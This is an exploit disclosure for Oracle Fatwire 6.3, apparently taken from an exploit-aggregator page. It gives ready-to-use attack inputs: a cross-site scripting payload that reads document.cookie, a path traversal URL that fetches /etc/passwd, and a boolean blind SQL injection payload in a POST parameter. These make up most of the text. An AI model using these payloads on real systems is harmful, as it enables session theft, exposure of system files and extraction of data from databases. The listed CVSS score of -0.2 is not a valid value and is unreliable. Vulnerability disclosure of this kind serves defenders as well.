Exploit for Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection

Name: Exploit for Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection
Rating: 5 (344 reviews)

2021-07-29 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:163703
# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities  
# Date: 29/07/2021  
# Exploit Author: J. Francisco Bolivar @Jfran_cbit  
# Vendor Homepage: https://www.oracle.com/index.html  
# Version: 6.3  
# Tested on: CentOS  
  
1. Xss  
  
Adt parameter is vulnerable to Xss:  
  
https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img  
src="a" onerror=alert(document.cookie);>  
  
2. Path Traversal  
  
https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd  
  
3. Blind Sql injection  
  
POST  
/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice  
HTTP/1.1  
Host: IPaddress  
  
pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX  
  
The vulnerable parameter is : id_ex (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND  
3958=3958&command=xxxxxT